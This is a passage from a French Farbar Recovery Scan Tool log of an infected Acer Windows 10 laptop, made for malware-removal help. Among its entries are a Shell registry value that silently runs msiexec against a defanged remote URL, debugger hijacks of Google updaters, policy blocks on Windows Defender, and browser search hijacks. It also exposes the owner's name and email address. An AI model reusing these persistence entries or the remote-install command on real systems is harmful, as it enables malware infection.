Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 29-06-2017 Exécuté par Anaëlle Jolivet (administrateur) sur PC-ACER-ANAELLE (29-06-2017 11:26:51) Exécuté depuis C:\Users\Anaëlle Jolivet\AppData\Local\Temp\scoped_dir1492_19289 Profils chargés: Anaëlle Jolivet (Profils disponibles: Anaëlle Jolivet) Platform: Windows 10 Home Version 1703 (X64) Langue: Français (France) Internet Explorer Version 11 (Navigateur par défaut: "C:\Program Files (x86)\Antanna\Application\chrome.exe" "%1") Mode d'amorçage: Normal Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processus (Avec liste blanche) ================= (Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.) (Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_82119d956c80af5a\igfxCUIService.exe (Intel Corporation) C:\Windows\System32\IntelSSTAPO\ParameterService\ParameterService.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe (Windows (R) Win 7 DDK provider) C:\Windows\System32\AdminService.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe (Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe (Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QASvc.exe (Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALSvc.exe (Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_82119d956c80af5a\igfxEM.exe (Microsoft Corporation) C:\Windows\System32\msiexec.exe (Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAgent.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAdminAgent.exe (Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALockHandler.exe (Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_82119d956c80af5a\igfxext.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe (Flux Software LLC) C:\Users\Anaëlle Jolivet\AppData\Local\FluxSoftware\Flux\flux.exe () C:\OEM\Preload\FubTracking\FubTracking.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe (Acer) C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Acer Cloud Technology) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser_crashreporter.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe () C:\Program Files\AVAST Software\Avast\AvastNM.exe () C:\Program Files (x86)\Acer\Care Center\ACCStd.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Google Inc.) C:\Program Files (x86)\Antanna\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Antanna\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Antanna\Application\chrome.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe () C:\Program Files\AVAST Software\Avast\AvastNM.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (acer) C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe (Avast Software) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe ==================== Registre (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.) HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16472832 2016-03-21] (Realtek Semiconductor) HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation) HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213832 2017-06-28] (AVAST Software) HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\...\Run: [Spotify Web Helper] => C:\Users\Anaëlle Jolivet\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-18] (Spotify Ltd) HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\...\Run: [Spotify] => C:\Users\Anaëlle Jolivet\AppData\Roaming\Spotify\Spotify.exe [7067760 2017-02-18] (Spotify Ltd) HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4557504 2016-10-06] (Disc Soft Ltd) HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\...\Run: [f.lux] => C:\Users\Anaëlle Jolivet\AppData\Local\FluxSoftware\Flux\flux.exe [1024240 2016-12-06] (Flux Software LLC) HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\...\Run: [background_fault] => "C:\Users\Anaëlle Jolivet\AppData\Local\background_fault\aswRD.exe" "C:\Users\Anaëlle Jolivet\AppData\Local\background_fault\bf.dll",background_fault_collector <==== ATTENTION HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8xNWM2NkF5FkM8FkF3RWw8OTlXRYE3MkE1NTLWOUE5RH== /q <==== ATTENTION IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellExecuteHooks: Pas de nom - {A65771C6-0D5A-11E7-9DEF-64006A5CFC23} - C:\Users\Anaëlle Jolivet\AppData\Roaming\Reazaskese\Masgrelerge.dll -> Pas de fichier <==== ATTENTION ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Anaëlle Jolivet\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Anaëlle Jolivet\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Anaëlle Jolivet\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ShellIconOverlayIdentifiers: [ ACloudSynced] -> {5CCE71FA-9F61-4F24-9CD1-98D819B40D68} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2016-09-09] (Acer Incorporated) ShellIconOverlayIdentifiers: [ ACloudSyncing] -> {C1E1456F-C2D8-4C96-870D-35F1E13941EE} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2016-09-09] (Acer Incorporated) ShellIconOverlayIdentifiers: [ ACloudToBeSynced] -> {307523FA-DDC0-4068-983F-2A6B34627744} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2016-09-09] (Acer Incorporated) ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-06-28] (AVAST Software) ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-06-28] (AVAST Software) ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Anaëlle Jolivet\AppData\Local\MEGAsync\ShellExtX32.dll -> Pas de fichier ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Anaëlle Jolivet\AppData\Local\MEGAsync\ShellExtX32.dll -> Pas de fichier ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Anaëlle Jolivet\AppData\Local\MEGAsync\ShellExtX32.dll -> Pas de fichier ShellIconOverlayIdentifiers-x32: [ ACloudSynced] -> {5CCE71FA-9F61-4F24-9CD1-98D819B40D68} => C:\Program Files (x86)\Acer\shellext\Win32\shellext_win.dll [2016-09-09] (Acer Incorporated) ShellIconOverlayIdentifiers-x32: [ ACloudSyncing] -> {C1E1456F-C2D8-4C96-870D-35F1E13941EE} => C:\Program Files (x86)\Acer\shellext\Win32\shellext_win.dll [2016-09-09] (Acer Incorporated) ShellIconOverlayIdentifiers-x32: [ ACloudToBeSynced] -> {307523FA-DDC0-4068-983F-2A6B34627744} => C:\Program Files (x86)\Acer\shellext\Win32\shellext_win.dll [2016-09-09] (Acer Incorporated) GroupPolicy: Restriction <==== ATTENTION ==================== Internet (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.) Tcpip\Parameters: [DhcpNameServer] 89.2.0.1 89.2.0.2 Tcpip\..\Interfaces\{5905f46a-8b0e-4abc-a9d0-853fbb83a431}: [DhcpNameServer] 89.2.0.1 89.2.0.2 Tcpip\..\Interfaces\{7accb53a-9a35-44e8-949f-b10cb76278c6}: [DhcpNameServer] 40.32.1.55 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://google.com HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://google.fr SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms} SearchScopes: HKU\S-1-5-21-2216742683-3699418852-1582624608-1001 -> DefaultScope {5BE328D9-1A31-44F2-A62D-4FC823AB2FFE} URL = SearchScopes: HKU\S-1-5-21-2216742683-3699418852-1582624608-1001 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = SearchScopes: HKU\S-1-5-21-2216742683-3699418852-1582624608-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04 SearchScopes: HKU\S-1-5-21-2216742683-3699418852-1582624608-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-2216742683-3699418852-1582624608-1001 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-06-21] (Microsoft Corporation) BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-06-21] (Microsoft Corporation) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-21] (Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-21] (Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-21] (Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-21] (Microsoft Corporation) Edge: ====== Edge HomeButtonPage: HKU\S-1-5-21-2216742683-3699418852-1582624608-1001 -> FireFox: ======== FF DefaultProfile: 0216rq2e.default FF ProfilePath: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\naweriweentcofise\Profiles\0216rq2e.default\Profiles\0216rq2e.default [non trouvé(e)] <==== ATTENTION FF ProfilePath: C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\0216rq2e.default\Profiles\0216rq2e.default [non trouvé(e)] <==== ATTENTION FF DefaultProfile: anaelle0jolivet@gmail.com FF ProfilePath: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default [2017-06-28] FF NewTab: ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default -> about:newtab FF DefaultSearchUrl: ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default -> hxxps://www.google.com/search?bcutc=sp-006 FF SearchEngineOrder.1: ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default -> Google FF SelectedSearchEngine: ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default -> Google FF Keyword.URL: ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default -> hxxps://www.google.com/search?bcutc=sp-006 FF Extension: (FF Adr) - C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-11] [non signé] FF Extension: (Amazon Assistant for Firefox) - C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\Extensions\abb-acer@amazon.com [2017-04-11] FF Extension: (Firefox Hotfix) - C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-10-16] FF Extension: (Dashlane) - C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\Extensions\jetpack-extension@dashlane.com.xpi [2016-11-25] FF Extension: (Français Language Pack) - C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\Extensions\langpack-fr@firefox.mozilla.org [2017-04-11] FF Extension: (Français Language Pack) - C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\Extensions\langpack-fr@firefox.mozilla.org.xpi [2017-05-03] [non signé] FF Extension: (Mozilla Partner Defaults) - C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\Extensions\partnerdefaults@mozilla.com [2017-04-11] FF Extension: (Youtube Unblocker Remediation) - C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\features\{8f0f2b24-31c0-42de-b70f-ee2f1c028b64}\malware-remediation@mozilla.org.xpi [2016-10-16] FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\searchplugins\google-avast.xml [2017-04-05] FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\searchplugins\ourluckysites.xml [2017-04-05] FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\searchplugins\startpageing123.xml [2017-03-31] FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\searchplugins\startsearch.xml [2017-05-03] FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\searchplugins\trovi.xml [2017-03-25] FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\searchplugins\yahoo! powered.xml [2016-10-28] FF ProfilePath: C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\Profiles\0216rq2e.default [2017-06-28] FF NewTab: Mozilla\Firefox\Profiles\0216rq2e.default -> about:newtab FF DefaultSearchEngine: Mozilla\Firefox\Profiles\0216rq2e.default -> Google FF DefaultSearchUrl: Mozilla\Firefox\Profiles\0216rq2e.default -> hxxps://www.google.com/search?bcutc=sp-006 FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\0216rq2e.default -> Google FF SelectedSearchEngine: Mozilla\Firefox\Profiles\0216rq2e.default -> Google FF Homepage: Mozilla\Firefox\Profiles\0216rq2e.default -> hxxp://www.google.com FF Keyword.URL: Mozilla\Firefox\Profiles\0216rq2e.default -> hxxps://www.google.com/search?bcutc=sp-006 FF Extension: (Amazon Assistant for Firefox) - C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\Profiles\0216rq2e.default\Extensions\abb-acer@amazon.com [2016-10-16] FF Extension: (Firefox Hotfix) - C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\Profiles\0216rq2e.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-10-16] FF Extension: (Dashlane) - C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\Profiles\0216rq2e.default\Extensions\jetpack-extension@dashlane.com.xpi [2016-11-25] FF Extension: (Français Language Pack) - C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\Profiles\0216rq2e.default\Extensions\langpack-fr@firefox.mozilla.org [2016-10-16] FF Extension: (Mozilla Partner Defaults) - C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\Profiles\0216rq2e.default\Extensions\partnerdefaults@mozilla.com [2016-10-16] FF Extension: (Avast SafePrice) - C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\Profiles\0216rq2e.default\Extensions\sp@avast.com.xpi [2017-06-28] FF Extension: (Avast Online Security) - C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\Profiles\0216rq2e.default\Extensions\wrc@avast.com.xpi [2017-06-28] FF Extension: (Youtube Unblocker Remediation) - C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\Profiles\0216rq2e.default\features\{8f0f2b24-31c0-42de-b70f-ee2f1c028b64}\malware-remediation@mozilla.org.xpi [2016-10-16] FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\Profiles\0216rq2e.default\searchplugins\google-avast.xml [2017-04-05] FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\Profiles\0216rq2e.default\searchplugins\luck.xml [2017-05-26] FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-05-26] (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN) FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN) FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN) Chrome: ======= CHR res: Infected resources.pak (search_engine). Reinstall Chrome. <==== ATTENTION CHR DefaultProfile: ChromeDefaultData CHR HomePage: ChromeDefaultData -> hxxp://www.google.fr/ CHR StartupUrls: ChromeDefaultData -> "hxxp://www.ourluckysites.com/?type=hp&ts=1491391283&z=910b0adb987bfc6f05476ffg0z2t5gfc8tcgdo0b6c&from=che0812&uid=ST1000LM024XHN-M101MBB_S31QJ9CH528666" CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1492418042&z=caa0870b86d794b67be7547gbzbtco1z7gcbee4zcz&from=che0812&uid=ST1000LM024XHN-M101MBB_S31QJ9CH528666&q={searchTerms} CHR DefaultSearchKeyword: ChromeDefaultData -> ourluckysites CHR Session Restore: ChromeDefaultData -> est activé. CHR Profile: C:\Users\Anaëlle Jolivet\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-06-28] <==== ATTENTION CHR Extension: (Google Slides) - C:\Users\Anaëlle Jolivet\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-10-25] CHR Extension: (Google Docs) - C:\Users\Anaëlle Jolivet\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2016-10-25] CHR Extension: (Google Drive) - C:\Users\Anaëlle Jolivet\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-10-25] CHR Extension: (YouTube) - C:\Users\Anaëlle Jolivet\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-10-25] CHR Extension: (Google Sheets) - C:\Users\Anaëlle Jolivet\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-10-25] CHR Extension: (Google Docs hors connexion) - C:\Users\Anaëlle Jolivet\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-11-01] CHR Extension: (AdBlock) - C:\Users\Anaëlle Jolivet\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-04-07] CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\Anaëlle Jolivet\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-25] CHR Extension: (Gmail) - C:\Users\Anaëlle Jolivet\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-10-25] CHR Extension: (Chrome Media Router) - C:\Users\Anaëlle Jolivet\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-05] CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.) <==== ATTENTION HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Antanna\Application\chrome.exe (Google Inc.) <==== ATTENTION HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.) <==== ATTENTION ==================== Services (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7430992 2017-06-28] (AVAST Software s.r.o.) R2 AtherosSvc; C:\WINDOWS\system32\AdminService.exe [355760 2016-06-26] (Windows (R) Win 7 DDK provider) R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [263312 2017-06-28] (AVAST Software) R2 CCDMonitorService; C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe [2267352 2016-08-30] (Acer Incorporated) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [4122816 2017-06-10] (Microsoft Corporation) S3 cphs; C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_82119d956c80af5a\IntelCpHeciSvc.exe [310256 2017-02-07] (Intel Corporation) S3 cplspcon; C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_82119d956c80af5a\IntelCpHDCPSvc.exe [488944 2017-02-07] (Intel Corporation) S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1468608 2016-10-06] (Disc Soft Ltd) R2 igfxCUIService2.0.0.0; C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_82119d956c80af5a\igfxCUIService.exe [350704 2017-02-07] (Intel Corporation) S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [976848 2016-01-14] (Intel(R) Corporation) S3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2016-02-05] (Intel Corporation) [Fichier non signé] R2 